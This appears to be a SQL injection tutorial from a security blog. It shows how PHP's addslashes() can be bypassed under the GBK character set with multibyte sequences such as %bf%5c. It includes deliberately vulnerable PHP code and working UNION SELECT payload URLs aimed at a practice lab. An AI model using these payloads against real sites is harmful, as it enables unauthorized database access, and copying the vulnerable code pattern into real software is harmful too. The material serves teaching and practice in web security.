Bypass Addslashes using Multibyte Character

I beleive this tutorial is nother unique or new as compared to other tutorials on Securityidiots. Tutorial related to Addslash bypass can be found easily, but as we are trying to make securityidiots a portal having every shit about SQLi. So this too is worth posting 🙂 .

Lets Start Our Tutorial With Little Bit of Code Reviewing:

PHP Code:
1.//including the Mysql connect parameters.
2.include("../sql-connections/sql-connect.php");
3.
4.
5.// take the variables 
6.if(isset($_GET['id']))
7.{
8.$id=addslashes($_GET['id']);
9.// connectivity 
10.
11.mysql_query("SET NAMES gbk");
12.$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
13.$result=mysql_query($sql);
14.$row = mysql_fetch_array($result);

The above code is fine example of secure code but the problem with the above code is the character set it is using. For testing and practice i have hosted the a vuln code at SQL Ninja Labs, we ll use that throughout this tutorial.

http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1

Now lets try creating an error with single quote:

http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1'

Single Quote : escaped as : 1\’. Lets check double quote and again result : escaped as : 1\”

http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1"

Filtering Slashes … and Look ! at the PHP code They Are Using Addslashes() and You Could See the Character Set Used is GBK at Line 8, addslash Function Could Be bypassed when Vulnerable Character sets includes Big5, GBK, and SJIS etc are using by SQL.

Explaination for the Bypass:

This works for two reasons:
The value 0xbf5c( ? ) is a valid multibyte character in GBK and as Well as addslashes does not check the MySQL character set.

We Could Always Try To bypass Addslashes ..with %bf and %af :D, So When We use %bf%27 as Our Input, addslashes() function adds a Slash(%5C) before our Quote(%27) and it becomes %bf%5C%27 and %bf%5C = a Chinese Multibyte Character ? and ThereFore %bf%5C%27 Equals To ?’ Which Executes Our Single Quote.

For Example : 
Code:
127.0.0.1/?id=%bf >>--> and now you can use qout..

Code:
127.0.0.1/?id=1%bf' >>--> yeah i see the error

Hopefully after adding that bypass you can get the below error.

http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%bf%5c'

Now lets try injecting and see if we can actually bypass it or not 😀

http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%af%5c'Union(select(1),2,3,4,5,6,7,8)%23

Now lets get the version() printed

http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%af%5c'Union(select(1),version(),3,4,5,6,7,8)%23

Thats all for our tutorial on Addslashes, I hope you will enjoy injecting the rest of the part in above given link XD, try injecting DIOS now :D.

Author : H_SQLi.EMpiRe

Leave a Reply